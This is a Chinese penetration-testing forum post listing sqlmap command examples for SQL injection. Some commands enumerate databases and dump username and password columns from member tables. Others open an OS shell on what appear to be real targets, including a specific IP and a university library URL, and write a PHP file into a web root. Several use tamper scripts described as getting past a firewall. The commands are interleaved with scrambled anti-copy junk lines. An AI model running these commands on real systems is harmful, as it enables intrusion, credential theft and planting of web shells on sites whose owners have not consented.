中国网络渗透测试联盟
标题:
sqlmap使用实例
[打印本页]
作者:
admin
时间:
2017-5-19 17:03
标题:
sqlmap使用实例
/pentest/database/sqlmap
2 o+ C7 s% W- e# m* [
" K- G* q9 ?, x! t) L! q
update :::::> in the folder after execute following order : svn update
8 `( E) O3 G6 \! J8 C% ]" P& ^0 I1 w
& Z; \6 _! X& h) H
sqlmap.py -r 1.txt --current-db
$ U' Z& A- ^( ~
3 z1 ]0 n* S3 T0 B
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
8 u5 D0 C3 Q3 Y2 _4 o
" z9 O6 P, w, D4 E) K. T9 q8 _2 I
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
7 g7 R/ c# Z: i& `1 K6 x
猜解数据库
0 {/ N9 s7 E* b! e8 i
./sqlmap.py -u "injection-url" --dbs
6 Q, R% G, h: a$ q, C
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
6 ]5 Y" L2 Y; G7 x: r
! }' W& q6 [5 g$ o6 s( p4 u
猜解表名
6 C ?7 h2 @. r
./sqlmap.py -u "injection-url" -D database_name --tables
, u1 Q8 t5 I$ B" ?, @
2 Y, s. v" b, [. q( g2 W
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
* v4 N. Y. [' y8 u6 D! S: V. S
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
; f, {0 r, a+ Z/ |6 ~! U# R
# @/ |- f! J% n q, D& ^! U
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
0 C! h- p3 |3 w5 r }- U
* X- k+ U. W/ n7 M
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
5 Z; k# X; W+ D( M
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
8 H3 M/ N" w5 b" A1 E" g' M
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
" P( T3 ]7 W2 c% y0 c0 _: |
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
2 ~3 M( ^5 e, b% \ L6 w% O+ c
( P3 X% F# c8 ~- i2 q, t
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
- @- o/ E" m- j+ J# I
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
0 q+ M, X" _; B: x% q
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
6 V: p+ J3 E8 f5 D" H' f
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
8 `* G) }( n( O- k; F5 D4 ?3 w3 j
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
4 [, G" ?' \# z% D/ d3 J0 [) [, d
. t0 L, k) Q! d% Y7 s0 m) c
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
" i: u, ?1 T5 Y* g# c9 \
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
; y/ Y O1 y# n) P* W' |. O
# i! y9 K. y3 c: D0 T6 G. g
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
, G' v) H( M$ [( ~, A# s
猜解列名
$ b3 k- F1 j- l7 z. F5 o' E: w
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
- Y2 L" y$ `) K9 t2 w5 U
/ f( B3 L- A5 I2 c( J
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
: m2 i' ]9 z5 w( [/ h7 `
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
: Q" P8 B; \2 |6 U" [
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
. [" O- Z, _5 i2 [) A* P
9 E8 I1 O: y( b
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
+ x w0 t( z- G; b) S
&submit=Go
: [* a4 z0 @3 k7 R) j) A( Z/ d
猜解值
9 P/ K3 V& t9 u2 Z" c
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
* v9 t" g T% a, |2 g( J
========================================================
" g( @' }* R: t. _- J
搜索表名中包括mana字符的
( t4 @. k# @8 X: I& e
/sqlmap.py -u "injection-url" -T mana --search
( L& Y4 {4 ^4 `, ~: p( i
返回一个交互式sql shell
- @" \4 I* i6 w6 M- i- c+ v
/sqlmap.py -u "injection-url" --sql-shell
# k s+ D6 h8 d0 }/ Y# L& p. W
读取指定文件(需权限)
! V4 o) Y' \* J G( x
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
6 Z8 U" q2 w7 Y+ u/ j) h/ R" @, \
查看当前 用户 及 数据库
3 P% i# f0 F7 Y. [: d
/sqlmap.py -u "injection-url" --current-user --current-db
5 o* z( X. T) {6 f2 l4 ?* @
本地文件 写入 远程目标绝对路径
, O. D) k6 r1 w
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
$ v) Z( I8 F. m& k6 i
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
' T i9 N: ^% Z9 @$ N0 ^
3 |1 ~9 h F. ]8 a$ _
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
1 V( m! n) }, y" K
查看某用的权限
$ l- P; X* k; D5 b; r
/sqlmap.py -u "injection-url" --privileges -U root
* u7 V, _8 `/ l! V7 z6 o
查看当前用户是否为dba
Q7 a, E: h# @
/sqlmap.py -u "injection-url" --is-dba
8 Q) u6 B0 J f1 X* C
读取所有数据库用户或指定数据库用户的密码
/ U7 G* Q+ O. X# E, \
sqlmap.py -r 1.txt --users --passwords
n8 b4 Y9 }1 M% o0 h
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
+ E% r4 B& K, p1 C; n
7 ^# C& T1 q- [/ T6 u
/sqlmap.py -u "injection-url" --passwords -U root
7 O3 V, p* |6 H, G. t
' A$ t; I. F/ \" B, c
--start&&--stop 与 --first&&--last 的区别
2 ^: A" R. x7 D5 V) ]0 z
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
1 h+ c1 D3 w; N, |
0 t2 ]- T9 D/ z7 }
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
4 Z9 ]+ z c% I2 `4 u/ ?
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
# l0 E0 A3 \* S, K& ^1 k6 W
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
3 a' v* A& X2 F; X$ M% J: `# }
9 ]( F- v5 g& `) }% s' H- a- |
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
7 n y# ]4 d5 U$ B+ j% ~. ^
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
9 O. t# U5 m* @. N
' o% F7 `$ p% L) ~- L
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2